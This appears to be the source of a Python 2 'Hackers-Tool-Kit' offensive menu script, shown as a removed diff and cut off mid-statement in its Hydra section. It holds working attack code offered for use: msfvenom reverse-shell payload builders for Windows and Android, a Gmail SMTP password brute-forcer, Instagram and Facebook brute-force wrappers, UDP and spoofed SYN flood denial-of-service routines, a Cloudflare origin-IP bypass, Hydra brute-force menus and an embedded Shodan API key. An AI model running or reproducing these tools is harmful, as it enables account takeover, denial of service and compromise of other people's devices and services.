'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,7) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file ] -phpload : make a php reverse_tcp payload and start it in a multi handler -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname 